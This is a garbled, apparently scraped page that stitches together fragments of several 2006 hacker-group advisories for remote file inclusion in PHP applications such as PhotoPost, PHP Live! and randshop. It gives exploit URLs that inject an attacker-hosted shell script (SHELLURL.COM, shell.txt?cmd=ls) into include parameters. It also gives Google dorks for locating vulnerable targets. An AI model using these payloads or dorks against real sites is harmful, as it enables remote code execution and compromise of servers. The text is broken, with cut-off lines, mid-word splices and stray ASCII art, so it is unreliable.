nc.php ) Remote File
Include Vulnerability
# Author: Al7ejaz Hacker
# Website: http://www.planetluc.com/en/ not free version
# Discovered: 15/12/2006
# Conatact : saudi[at]hotmail.fr - & - al7ejaz.hackerz[at
+
+
;;ii,,:: +
+ ::
;;t
+
+
;;ii,,:: +
+
#
#Pie Cart Pro => (Home_Path) Remote File Inclusion Exploit
#
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
#http://www.doodlebabies.
#
#PhotoPost => 4.6 (PP_PATH) Remote File Inclusion Exploit
#
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
#http://www.popphoto.
#
#PhotoPost =>4.6 (PP_PATH) Remote File Inclusion Exploit
#
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
#http://www.popphoto.
#
#Magic News Pro => 1.0.3 (script_path) Remote File Inclusion Exploit
#
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
#http://www.reamdaysoft.
#
#PhotoKorn Gallery => 1.52 (dir_path) Remote File Inclusion Exploit
#
#
#Critical Level : Dangerous
#
#By Saudi Hac
vel : Dangerous
#
#By Saudi Hackrz
#
#http://www.in-portal.net/
#http://www.in-portal.net/products
com/sid=http://SHELLURL.COM
#===
#Discoverd By : Saudi Hackrz
#
#Conatact : Saudi.unix[at]hotmail.com
#
#GreetZ : SnIpEr_Sa. Alarraab. SHiKaA. King18
#www.3asfh.net
=
By saudi hackrz
Rish : High
---
test on tis site : www.filters.ru
---
google : allinurl:"com_moskool" or "moskool"
Exploit :
http://[target]/component/option,com_moskool/Itemid,
iscoverd By : SHiKaA
Conatact : SHiKaA-[at]hotmail.com
_________-
and Discoverd By : saudi hackrz
The breath of the error in another files
-
SQuery/lib/devi.php?libpath=http://SHELLURL.COM?
--
SQuery/lib/armygame.php?libpath=http://SHELLURL.COM?
---
SQu
-PHP Live! v3.2 (header.php) Remote File Include Vulnerabilities
By saudi hackrz
---
Exploit :
http://[target]/[path]/setup/header.php?css_path=http://sit/shell.txt?cmd=ls
d.txt?&cmd=ls
-
greatz:
~
SnIpEr.SA , KING18, BLACK HOURS, AL-ARAAB,
---
Contact:
~~~
Nick: saudi hackrz
E-mail: saudi.unix[at]hotmail[dot]Com
site: http://www.3asfh.net
Title : randshop <= 1.1.x Remote File Inclusion Vulnerability
-
URL : http://www.randshop.com/
-
Author :Saudi Hackrz
-
contact : Saudi.Unix[at]Hotmail.com
-
dork: "software 2004-2005 by randshop"
-
exploit :
http://[target]/[pa
15 matches
Mail list logo